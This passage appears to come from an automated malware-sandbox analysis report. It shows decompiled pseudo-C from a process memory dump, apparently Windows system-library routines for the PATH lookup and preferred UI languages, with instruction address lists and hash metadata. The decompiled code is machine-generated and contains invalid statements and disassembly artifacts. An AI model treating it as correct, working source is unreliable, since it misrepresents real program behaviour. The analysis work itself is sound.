                        														__eax = E02B839F2(__ecx);
                        														__edi = __eax;
                        													}
                        													goto L28;
                        												case 8:
                        													__eax = 0;
                        													 *(__edi - 2) = __ax;
                        													 *0x2be6e58 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be6e5c,  *0x2be6e58 & 0x0000ffff);
                        													 *(__esi + 0x38) = __edi;
                        													__eax =  *0x2be6e58 & 0x0000ffff;
                        													__eax = ( *0x2be6e58 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													__edi = __edi + 2;
                        													L28:
                        													_t291 = _v16;
                        													_t308 = _v32;
                        													L29:
                        													_t277 = _t277 + 4;
                        													__eflags = _t277;
                        													_v56 = _t277;
                        													goto L30;
                        											}
                        										}
                        									}
                        									goto L108;
                        									L30:
                        									_t291 = _t291 + 1;
                        									_v16 = _t291;
                        									__eflags = _t291 - _v48;
                        								} while (_t291 < _v48);
                        								goto L31;
                        							}
                        						}
                        					}
                        				} else {
                        					while(1) {
                        						L1:
                        						_t241 =  *(_v60 + _t327 * 4);
                        						if(_t241 > 8) {
                        							break;
                        						}
                        						switch( *((intOrPtr*)(_t241 * 4 +  &M02B22935))) {
                        							case 0:
                        								__ax =  *0x2be8488;
                        								__eflags = __ax;
                        								if(__ax != 0) {
                        									__eax = __ax & 0x0000ffff;
                        									__ebx = __ebx + 2;
                        									__eflags = __ebx;
                        									goto L53;
                        								}
                        								goto L14;
                        							case 1:
                        								L44:
                        								_t308 =  &_v64;
                        								_v80 = E02B22E3E(0,  &_v64);
                        								_t277 = _t277 + _v64 + 2;
                        								goto L13;
                        							case 2:
                        								__eax =  *0x2be8480 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2be8480;
                        									goto L80;
                        								}
                        								goto L14;
                        							case 3:
                        								__eax = E02B0EEF0(0x2be79a0);
                        								__eax =  &_v44;
                        								_push(__eax);
                        								_push(0);
                        								_push(0);
                        								_push(4);
                        								_push(L"PATH");
                        								_push(0);
                        								L57();
                        								__esi = __eax;
                        								_v68 = __esi;
                        								__eflags = __esi - 0xc0000023;
                        								if(__esi != 0xc0000023) {
                        									L10:
                        									__eax = E02B0EB70(__ecx, 0x2be79a0);
                        									__eflags = __esi - 0xc0000100;
                        									if(__esi == 0xc0000100) {
                        										_v44 = _v44 & 0x00000000;
                        										__eax = 0;
                        										_v68 = 0;
                        										goto L13;
                        									} else {
                        										__eflags = __esi;
                        										if(__esi < 0) {
                        											L32:
                        											_t215 = _v72;
                        											__eflags = _t215;
                        											if(_t215 != 0) {
                        												L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                        											}
                        											_t216 = _v52;
                        											__eflags = _t216;
                        											if(_t216 != 0) {
                        												__eflags = _t335;
                        												if(_t335 < 0) {
                        													L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                        													_t216 = 0;
                        												}
                        											}
                        											goto L36;
                        										} else {
                        											__eax = _v44;
                        											__ebx = __ebx + __eax * 2;
                        											__ebx = __ebx + 2;
                        											__eflags = __ebx;
                        											L13:
                        											_t287 = _v36;
                        											goto L14;
                        										}
                        									}
                        								} else {
                        									__eax = _v44;
                        									__ecx =  *0x2be7b9c; // 0x0
                        									_v44 + _v44 =  *[fs:0x30];
                        									__ecx = __ecx + 0x180000;
                        									__eax = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                        									_v72 = __eax;
                        									__eflags = __eax;
                        									if(__eax == 0) {
                        										__eax = E02B0EB70(__ecx, 0x2be79a0);
                        										__eax = _v52;
                        										L36:
                        										_pop(_t328);
                        										_pop(_t336);
                        										__eflags = _v8 ^ _t340;
                        										_pop(_t278);
                        										return E02B3B640(_t216, _t278, _v8 ^ _t340, _t308, _t328, _t336);
                        									} else {
                        										__ecx =  &_v44;
                        										_push(__ecx);
                        										_push(_v44);
                        										_push(__eax);
                        										_push(4);
                        										_push(L"PATH");
                        										_push(0);
                        										L57();
                        										__esi = __eax;
                        										_v68 = __eax;
                        										goto L10;
                        									}
                        								}
                        								goto L108;
                        							case 4:
                        								__ebx = __ebx + 4;
                        								goto L14;
                        							case 5:
                        								_t273 = _v56;
                        								if(_v56 != 0) {
                        									_t308 =  &_v36;
                        									_t275 = E02B22E3E(_t273,  &_v36);
                        									_t287 = _v36;
                        									_v76 = _t275;
                        								}
                        								if(_t287 == 0) {
                        									goto L44;
                        								} else {
                        									_t277 = _t277 + 2 + _t287;
                        								}
                        								goto L14;
                        							case 6:
                        								__eax =  *0x2be5764 & 0x0000ffff;
                        								goto L53;
                        							case 7:
                        								__eax =  *0x2be8478 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									__ebx = __ebx + 0x16;
                        									__ebx = __ebx + __eax;
                        								}
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2be8478;
                        									L80:
                        									_v32 = __eax;
                        								}
                        								goto L14;
                        							case 8:
                        								__eax =  *0x2be6e58 & 0x0000ffff;
                        								__eax = ( *0x2be6e58 & 0x0000ffff) + 2;
                        								L53:
                        								__ebx = __ebx + __eax;
                        								L14:
                        								_t327 = _t327 + 1;
                        								if(_t327 >= _v48) {
                        									goto L16;
                        								} else {
                        									_t308 = _v37;
                        									goto L1;
                        								}
                        								goto L108;
                        						}
                        					}
                        					L56:
                        					asm("int 0x29");
                        					asm("out 0x28, al");
                        					asm("o16 sub [edx-0x4dd81ffe], dh");
                        					_t337 = _t334 + 1;
                        					 *0xFFFFFFFFB2260504 =  *((intOrPtr*)(0xffffffffb2260504)) - 2;
                        					_t282 = 0x25;
                        					_t345 = _t241;
                        					 *0xFFFFFFFFB65B3504 =  *((intOrPtr*)(0xffffffffb65b3504)) - 2;
                        					 *0xFFFFFFFFB2288004 =  *((intOrPtr*)(0xffffffffb2288004)) - _t334 + 1;
                        					asm("daa");
                        					_push(ds);
                        					 *0xFFFFFFFFB2284E04 =  *((intOrPtr*)(0xffffffffb2284e04)) - 2;
                        					_t283 = _t282 + _a35;
                        					asm("fcomp dword [ebx-0x4a]");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(0x20);
                        					_push(0x2bcff00);
                        					E02B4D08C(_t283, _t329, _t337);
                        					_v44 =  *[fs:0x18];
                        					_t330 = 0;
                        					 *_a24 = 0;
                        					_t284 = _a12;
                        					__eflags = _t284;
                        					if(_t284 == 0) {
                        						_t246 = 0xc0000100;
                        					} else {
                        						_v8 = 0;
                        						_t338 = 0xc0000100;
                        						_v52 = 0xc0000100;
                        						_t248 = 4;
                        						while(1) {
                        							_v40 = _t248;
                        							__eflags = _t248;
                        							if(_t248 == 0) {
                        								break;
                        							}
                        							_t298 = _t248 * 0xc;
                        							_v48 = _t298;
                        							__eflags = _t284 -  *((intOrPtr*)(_t298 + 0x2ad1664));
                        							if(__eflags <= 0) {
                        								if(__eflags == 0) {
                        									_t263 = E02B3E5C0(_a8,  *((intOrPtr*)(_t298 + 0x2ad1668)), _t284);
                        									_t345 = _t345 + 0xc;
                        									__eflags = _t263;
                        									if(__eflags == 0) {
                        										_t338 = E02B751BE(_t284,  *((intOrPtr*)(_v48 + 0x2ad166c)), _a16, _t330, _t338, __eflags, _a20, _a24);
                        										_v52 = _t338;
                        										break;
                        									} else {
                        										_t248 = _v40;
                        										goto L62;
                        									}
                        									goto L70;
                        								} else {
                        									L62:
                        									_t248 = _t248 - 1;
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        						_v32 = _t338;
                        						__eflags = _t338;
                        						if(_t338 < 0) {
                        							__eflags = _t338 - 0xc0000100;
                        							if(_t338 == 0xc0000100) {
                        								_t294 = _a4;
                        								__eflags = _t294;
                        								if(_t294 != 0) {
                        									_v36 = _t294;
                        									__eflags =  *_t294 - _t330;
                        									if( *_t294 == _t330) {
                        										_t338 = 0xc0000100;
                        										goto L76;
                        									} else {
                        										_t318 =  *((intOrPtr*)(_v44 + 0x30));
                        										_t250 =  *((intOrPtr*)(_t318 + 0x10));
                        										__eflags =  *((intOrPtr*)(_t250 + 0x48)) - _t294;
                        										if( *((intOrPtr*)(_t250 + 0x48)) == _t294) {
                        											__eflags =  *(_t318 + 0x1c);
                        											if( *(_t318 + 0x1c) == 0) {
                        												L106:
                        												_t338 = E02B22AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                        												_v32 = _t338;
                        												__eflags = _t338 - 0xc0000100;
                        												if(_t338 != 0xc0000100) {
                        													goto L69;
                        												} else {
                        													_t330 = 1;
                        													_t294 = _v36;
                        													goto L75;
                        												}
                        											} else {
                        												_t253 = E02B06600( *(_t318 + 0x1c));
                        												__eflags = _t253;
                        												if(_t253 != 0) {
                        													goto L106;
                        												} else {
                        													_t294 = _a4;
                        													goto L75;
                        												}
                        											}
                        										} else {
                        											L75:
                        											_t338 = E02B22C50(_t294, _a8, _t284, _a16, _a20, _a24, _t330);
                        											L76:
                        											_v32 = _t338;
                        											goto L69;
                        										}
                        									}
                        									goto L108;
                        								} else {
                        									E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        									_v8 = 1;
                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                        									_t338 = _a24;
                        									_t260 = E02B22AE4( &_v36, _a8, _t284, _a16, _a20, _t338);
                        									_v32 = _t260;
                        									__eflags = _t260 - 0xc0000100;
                        									if(_t260 == 0xc0000100) {
                        										_v32 = E02B22C50(_v36, _a8, _t284, _a16, _a20, _t338, 1);
                        									}
                        									_v8 = _t330;
                        									E02B22ACB();
                        								}
                        							}
                        						}
                        						L69:
                        						_v8 = 0xfffffffe;
                        						_t246 = _t338;
                        					}
                        					L70:
                        					return E02B4D0D1(_t246);
                        				}
                        				L108:
                        			}



















































                        0x02b22778
                        0x02b2277e
                        0x02b2277e
                        0x02b22781
                        0x02b22781
                        0x02b22783
                        0x02b22784
                        0x00000000
                        0x00000000
                        0x02b65bd8
                        0x02b65bde
                        0x02b65be4
                        0x02b65be6
                        0x02b65be8
                        0x02b65be9
                        0x02b65bee
                        0x02b65bf8
                        0x02b65bff
                        0x02b65c01
                        0x02b65c04
                        0x02b65c07
                        0x02b65c0b
                        0x02b65c0d
                        0x02b65c0d
                        0x02b65c15
                        0x02b65c18
                        0x02b65c1b
                        0x02b65c1b
                        0x02b65c1e
                        0x00000000
                        0x00000000
                        0x02b228c3
                        0x02b228c8
                        0x02b228d2
                        0x02b228d4
                        0x02b228d8
                        0x02b228db
                        0x02b65c26
                        0x02b65c28
                        0x02b65c2d
                        0x02b65c2d
                        0x00000000
                        0x00000000
                        0x02b65c34
                        0x02b65c36
                        0x02b65c49
                        0x02b65c4e
                        0x02b65c54
                        0x02b65c5b
                        0x02b65c5d
                        0x02b65c60
                        0x02b22788
                        0x02b22788
                        0x02b2278b
                        0x02b2278e
                        0x02b2278e
                        0x02b2278e
                        0x02b22791
                        0x00000000
                        0x00000000
                        0x02b22756
                        0x02b22750
                        0x00000000
                        0x02b22794
                        0x02b22794
                        0x02b22795
                        0x02b22798
                        0x02b22798
                        0x00000000
                        0x02b22734
                        0x02b2272c
                        0x02b22700
                        0x02b225ef
                        0x02b225ef
                        0x02b225ef
                        0x02b225f2
                        0x02b225f8
                        0x00000000
                        0x00000000
                        0x02b225fe
                        0x00000000
                        0x02b228e6
                        0x02b228ec
                        0x02b228ef
                        0x02b228f5
                        0x02b228f8
                        0x02b228f8
                        0x00000000
                        0x02b228f8
                        0x00000000
                        0x00000000
                        0x02b22866
                        0x02b22866
                        0x02b22876
                        0x02b22879
                        0x00000000
                        0x00000000
                        0x02b227e0
                        0x02b227e7
                        0x02b227e9
                        0x02b227eb
                        0x02b65afd
                        0x00000000
                        0x02b65afd
                        0x00000000
                        0x00000000
                        0x02b22633
                        0x02b22638
                        0x02b2263b
                        0x02b2263c
                        0x02b2263e
                        0x02b22640
                        0x02b22642
                        0x02b22647
                        0x02b22649
                        0x02b2264e
                        0x02b22650
                        0x02b22653
                        0x02b22659
                        0x02b226a2
                        0x02b226a7
                        0x02b226ac
                        0x02b226b2
                        0x02b65b11
                        0x02b65b15
                        0x02b65b17
                        0x00000000
                        0x02b226b8
                        0x02b226b8
                        0x02b226ba
                        0x02b227a6
                        0x02b227a6
                        0x02b227a9
                        0x02b227ab
                        0x02b227b9
                        0x02b227b9
                        0x02b227be
                        0x02b227c1
                        0x02b227c3
                        0x02b227c5
                        0x02b227c7
                        0x02b65c74
                        0x02b65c79
                        0x02b65c79
                        0x02b227c7
                        0x00000000
                        0x02b226c0
                        0x02b226c0
                        0x02b226c3
                        0x02b226c6
                        0x02b226c6
                        0x02b226c9
                        0x02b226c9
                        0x00000000
                        0x02b226c9
                        0x02b226ba
                        0x02b2265b
                        0x02b2265b
                        0x02b2265e
                        0x02b22667
                        0x02b2266d
                        0x02b22677
                        0x02b2267c
                        0x02b2267f
                        0x02b22681
                        0x02b65b49
                        0x02b65b4e
                        0x02b227cd
                        0x02b227d0
                        0x02b227d1
                        0x02b227d2
                        0x02b227d4
                        0x02b227dd
                        0x02b22687
                        0x02b22687
                        0x02b2268a
                        0x02b2268b
                        0x02b2268e
                        0x02b2268f
                        0x02b22691
                        0x02b22696
                        0x02b22698
                        0x02b2269d
                        0x02b2269f
                        0x00000000
                        0x02b2269f
                        0x02b22681
                        0x00000000
                        0x00000000
                        0x02b22846
                        0x00000000
                        0x00000000
                        0x02b22605
                        0x02b2260a
                        0x02b2260c
                        0x02b22611
                        0x02b22616
                        0x02b22619
                        0x02b22619
                        0x02b2261e
                        0x00000000
                        0x02b22624
                        0x02b22627
                        0x02b22627
                        0x00000000
                        0x00000000
                        0x02b65b1f
                        0x00000000
                        0x00000000
                        0x02b22894
                        0x02b2289b
                        0x02b2289d
                        0x02b228a1
                        0x02b65b2b
                        0x02b65b2e
                        0x02b65b2e
                        0x02b228a7
                        0x02b228a9
                        0x02b65b04
                        0x02b65b09
                        0x02b65b09
                        0x02b65b09
                        0x00000000
                        0x00000000
                        0x02b65b35
                        0x02b65b3c
                        0x02b228fb
                        0x02b228fb
                        0x02b226cc
                        0x02b226cc
                        0x02b226d0
                        0x00000000
                        0x02b226d2
                        0x02b226d2
                        0x00000000
                        0x02b226d2
                        0x00000000
                        0x00000000
                        0x02b225fe
                        0x02b2292d
                        0x02b22930
                        0x02b22935
                        0x02b22939
                        0x02b22945
                        0x02b22946
                        0x02b2294e
                        0x02b22951
                        0x02b22952
                        0x02b2295a
                        0x02b22962
                        0x02b22965
                        0x02b22966
                        0x02b2296c
                        0x02b22971
                        0x02b2297d
                        0x02b2297e
                        0x02b2297f
                        0x02b22980
                        0x02b22981
                        0x02b22982
                        0x02b22983
                        0x02b22984
                        0x02b22985
                        0x02b22986
                        0x02b22987
                        0x02b22988
                        0x02b22989
                        0x02b2298a
                        0x02b2298b
                        0x02b2298c
                        0x02b2298d
                        0x02b2298e
                        0x02b2298f
                        0x02b22990
                        0x02b22992
                        0x02b22997
                        0x02b229a3
                        0x02b229a6
                        0x02b229ab
                        0x02b229ad
                        0x02b229b0
                        0x02b229b2
                        0x02b65c80
                        0x02b229b8
                        0x02b229b8
                        0x02b229bb
                        0x02b229c0
                        0x02b229c5
                        0x02b229c6
                        0x02b229c6
                        0x02b229c9
                        0x02b229cb
                        0x00000000
                        0x00000000
                        0x02b229cd
                        0x02b229d0
                        0x02b229d9
                        0x02b229db
                        0x02b229dd
                        0x02b22a7f
                        0x02b22a84
                        0x02b22a87
                        0x02b22a89
                        0x02b65ca1
                        0x02b65ca3
                        0x00000000
                        0x02b22a8f
                        0x02b22a8f
                        0x00000000
                        0x02b22a8f
                        0x00000000
                        0x02b229e3
                        0x02b229e3
                        0x02b229e3
                        0x00000000
                        0x02b229e3
                        0x02b229dd
                        0x00000000
                        0x02b229db
                        0x02b229e6
                        0x02b229e9
                        0x02b229eb
                        0x02b229ed
                        0x02b229f3
                        0x02b229f5
                        0x02b229f8
                        0x02b229fa
                        0x02b22a97
                        0x02b22a9a
                        0x02b22a9d
                        0x02b22add
                        0x00000000
                        0x02b22a9f
                        0x02b22aa2
                        0x02b22aa5
                        0x02b22aa8
                        0x02b22aab
                        0x02b65cab
                        0x02b65caf
                        0x02b65cc5
                        0x02b65cda
                        0x02b65cdc
                        0x02b65cdf
                        0x02b65ce5
                        0x00000000
                        0x02b65ceb
                        0x02b65ced
                        0x02b65cee
                        0x00000000
                        0x02b65cee
                        0x02b65cb1
                        0x02b65cb4
                        0x02b65cb9
                        0x02b65cbb
                        0x00000000
                        0x02b65cbd
                        0x02b65cbd
                        0x00000000
                        0x02b65cbd
                        0x02b65cbb
                        0x02b22ab1
                        0x02b22ab1
                        0x02b22ac4
                        0x02b22ac6
                        0x02b22ac6
                        0x00000000
                        0x02b22ac6
                        0x02b22aab
                        0x00000000
                        0x02b22a00
                        0x02b22a09
                        0x02b22a0e
                        0x02b22a21
                        0x02b22a24
                        0x02b22a35
                        0x02b22a3a
                        0x02b22a3d
                        0x02b22a42
                        0x02b22a59
                        0x02b22a59
                        0x02b22a5c
                        0x02b22a5f
                        0x02b22a5f
                        0x02b229fa
                        0x02b229f3
                        0x02b22a64
                        0x02b22a64
                        0x02b22a6b
                        0x02b22a6b
                        0x02b22a6d
                        0x02b22a72
                        0x02b22a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: dc17bbac4f34a8bbe5b64c30c6e24fe5bdeb1138cecfb507a46446266dfc508f
                        • Instruction ID: b5f9a1405eb73c274267dd0c4e1bc6422e31c09e9d6d8430ab986797779d5d9a
                        • Opcode Fuzzy Hash: dc17bbac4f34a8bbe5b64c30c6e24fe5bdeb1138cecfb507a46446266dfc508f
                        • Instruction Fuzzy Hash: A2C18DB2D00229DBDB25DF98D880BBDB7B1FF48744F4844A9E905EB260D734AD55CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02B2FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                        				char _v5;
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				char _v17;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				char _v32;
                        				signed int _v40;
                        				void* __ecx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t73;
                        				intOrPtr* _t75;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				intOrPtr _t83;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t106;
                        				signed int _t108;
                        				signed int _t114;
                        				signed int _t116;
                        				signed int _t118;
                        				signed int _t122;
                        				signed int _t123;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				intOrPtr* _t134;
                        				signed int _t138;
                        				signed int _t141;
                        				signed int _t147;
                        				intOrPtr _t153;
                        				signed int _t154;
                        				signed int _t155;
                        				signed int _t170;
                        				void* _t174;
                        				signed int _t176;
                        				signed int _t177;
                        
                        				_t129 = __ebx;
                        				_push(_t132);
                        				_push(__esi);
                        				_t174 = _t132;
                        				_t73 =  !( *( *(_t174 + 0x18)));
                        				if(_t73 >= 0) {
                        					L5:
                        					return _t73;
                        				} else {
                        					E02B0EEF0(0x2be7b60);
                        					_t134 =  *0x2be7b84; // 0x77f07b80
                        					_t2 = _t174 + 0x24; // 0x24
                        					_t75 = _t2;
                        					if( *_t134 != 0x2be7b80) {
                        						_push(3);
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2be7b60);
                        						_t170 = _v8;
                        						_v28 = 0;
                        						_v40 = 0;
                        						_v24 = 0;
                        						_v17 = 0;
                        						_v32 = 0;
                        						__eflags = _t170 & 0xffff7cf2;
                        						if((_t170 & 0xffff7cf2) != 0) {
                        							L43:
                        							_t77 = 0xc000000d;
                        						} else {
                        							_t79 = _t170 & 0x0000000c;
                        							__eflags = _t79;
                        							if(_t79 != 0) {
                        								__eflags = _t79 - 0xc;
                        								if(_t79 == 0xc) {
                        									goto L43;
                        								} else {
                        									goto L9;
                        								}
                        							} else {
                        								_t170 = _t170 | 0x00000008;
                        								__eflags = _t170;
                        								L9:
                        								_t81 = _t170 & 0x00000300;
                        								__eflags = _t81 - 0x300;
                        								if(_t81 == 0x300) {
                        									goto L43;
                        								} else {
                        									_t138 = _t170 & 0x00000001;
                        									__eflags = _t138;
                        									_v24 = _t138;
                        									if(_t138 != 0) {
                        										__eflags = _t81;
                        										if(_t81 != 0) {
                        											goto L43;
                        										} else {
                        											goto L11;
                        										}
                        									} else {
                        										L11:
                        										_push(_t129);
                        										_t77 = E02B06D90( &_v20);
                        										_t130 = _t77;
                        										__eflags = _t130;
                        										if(_t130 >= 0) {
                        											_push(_t174);
                        											__eflags = _t170 & 0x00000301;
                        											if((_t170 & 0x00000301) == 0) {
                        												_t176 = _a8;
                        												__eflags = _t176;
                        												if(__eflags == 0) {
                        													L64:
                        													_t83 =  *[fs:0x18];
                        													_t177 = 0;
                        													__eflags =  *(_t83 + 0xfb8);
                        													if( *(_t83 + 0xfb8) != 0) {
                        														E02B076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                        													}
                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                        													goto L15;
                        												} else {
                        													asm("sbb edx, edx");
                        													_t114 = E02B98938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                        													__eflags = _t114;
                        													if(_t114 < 0) {
                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                        														E02AFB150();
                        													}
                        													_t116 = E02B96D81(_t176,  &_v16);
                        													__eflags = _t116;
                        													if(_t116 >= 0) {
                        														__eflags = _v16 - 2;
                        														if(_v16 < 2) {
                        															L56:
                        															_t118 = E02B075CE(_v20, 5, 0);
                        															__eflags = _t118;
                        															if(_t118 < 0) {
                        																L67:
                        																_t130 = 0xc0000017;
                        																goto L32;
                        															} else {
                        																__eflags = _v12;
                        																if(_v12 == 0) {
                        																	goto L67;
                        																} else {
                        																	_t153 =  *0x2be8638; // 0x0
                        																	_t122 = L02B038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                        																	_t154 = _v12;
                        																	_t130 = _t122;
                        																	__eflags = _t130;
                        																	if(_t130 >= 0) {
                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                        																		__eflags = _t123;
                        																		if(_t123 != 0) {
                        																			_t155 = _a12;
                        																			__eflags = _t155;
                        																			if(_t155 != 0) {
                        																				 *_t155 = _t123;
                        																			}
                        																			goto L64;
                        																		} else {
                        																			E02B076E2(_t154);
                        																			goto L41;
                        																		}
                        																	} else {
                        																		E02B076E2(_t154);
                        																		_t177 = 0;
                        																		goto L18;
                        																	}
                        																}
                        															}
                        														} else {
                        															__eflags =  *_t176;
                        															if( *_t176 != 0) {
                        																goto L56;
                        															} else {
                        																__eflags =  *(_t176 + 2);
                        																if( *(_t176 + 2) == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L56;
                        																}
                        															}
                        														}
                        													} else {
                        														_t130 = 0xc000000d;
                        														goto L32;
                        													}
                        												}
                        												goto L35;
                        											} else {
                        												__eflags = _a8;
                        												if(_a8 != 0) {
                        													_t77 = 0xc000000d;
                        												} else {
                        													_v5 = 1;
                        													L02B2FCE3(_v20, _t170);
                        													_t177 = 0;
                        													__eflags = 0;
                        													L15:
                        													_t85 =  *[fs:0x18];
                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                        														L18:
                        														__eflags = _t130;
                        														if(_t130 != 0) {
                        															goto L32;
                        														} else {
                        															__eflags = _v5 - _t130;
                        															if(_v5 == _t130) {
                        																goto L32;
                        															} else {
                        																_t86 =  *[fs:0x18];
                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                        																}
                        																__eflags = _t177;
                        																if(_t177 == 0) {
                        																	L31:
                        																	__eflags = 0;
                        																	L02B070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                        																	goto L32;
                        																} else {
                        																	__eflags = _v24;
                        																	_t91 =  *(_t177 + 0x20);
                        																	if(_v24 != 0) {
                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                        																		goto L31;
                        																	} else {
                        																		_t141 = _t91 & 0x00000040;
                        																		__eflags = _t170 & 0x00000100;
                        																		if((_t170 & 0x00000100) == 0) {
                        																			__eflags = _t141;
                        																			if(_t141 == 0) {
                        																				L74:
                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                        																				goto L27;
                        																			} else {
                        																				_t177 = E02B2FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					goto L42;
                        																				} else {
                        																					_t130 = E02B2FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						_t68 = _t177 + 0x20;
                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                        																						__eflags =  *_t68;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L74;
                        																					}
                        																				}
                        																			}
                        																			goto L35;
                        																		} else {
                        																			__eflags = _t141;
                        																			if(_t141 != 0) {
                        																				_t177 = E02B2FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					L42:
                        																					_t77 = 0xc0000001;
                        																					goto L33;
                        																				} else {
                        																					_t130 = E02B2FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L26;
                        																					}
                        																				}
                        																				goto L35;
                        																			} else {
                        																				L26:
                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                        																				__eflags = _t94;
                        																				L27:
                        																				 *(_t177 + 0x20) = _t94;
                        																				__eflags = _t170 & 0x00008000;
                        																				if((_t170 & 0x00008000) != 0) {
                        																					_t95 = _a12;
                        																					__eflags = _t95;
                        																					if(_t95 != 0) {
                        																						_t96 =  *_t95;
                        																						__eflags = _t96;
                        																						if(_t96 != 0) {
                        																							 *((short*)(_t177 + 0x22)) = 0;
                        																							_t40 = _t177 + 0x20;
                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                        																							__eflags =  *_t40;
                        																						}
                        																					}
                        																				}
                        																				goto L31;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                        														_t106 =  *(_t147 + 0x20);
                        														__eflags = _t106 & 0x00000040;
                        														if((_t106 & 0x00000040) != 0) {
                        															_t147 = E02B2FD22(_t147);
                        															__eflags = _t147;
                        															if(_t147 == 0) {
                        																L41:
                        																_t130 = 0xc0000001;
                        																L32:
                        																_t77 = _t130;
                        																goto L33;
                        															} else {
                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                        																_t106 =  *(_t147 + 0x20);
                        																goto L17;
                        															}
                        															goto L35;
                        														} else {
                        															L17:
                        															_t108 = _t106 | 0x00000080;
                        															__eflags = _t108;
                        															 *(_t147 + 0x20) = _t108;
                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                        															goto L18;
                        														}
                        													}
                        												}
                        											}
                        											L33:
                        										}
                        									}
                        								}
                        							}
                        						}
                        						L35:
                        						return _t77;
                        					} else {
                        						 *_t75 = 0x2be7b80;
                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                        						 *_t134 = _t75;
                        						 *0x2be7b84 = _t75;
                        						_t73 = E02B0EB70(_t134, 0x2be7b60);
                        						if( *0x2be7b20 != 0) {
                        							_t73 =  *( *[fs:0x30] + 0xc);
                        							if( *((char*)(_t73 + 0x28)) == 0) {
                        								_t73 = E02B0FF60( *0x2be7b20);
                        							}
                        						}
                        						goto L5;
                        					}
                        				}
                        			}

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02B6BE0F
                        Memory Dump Source
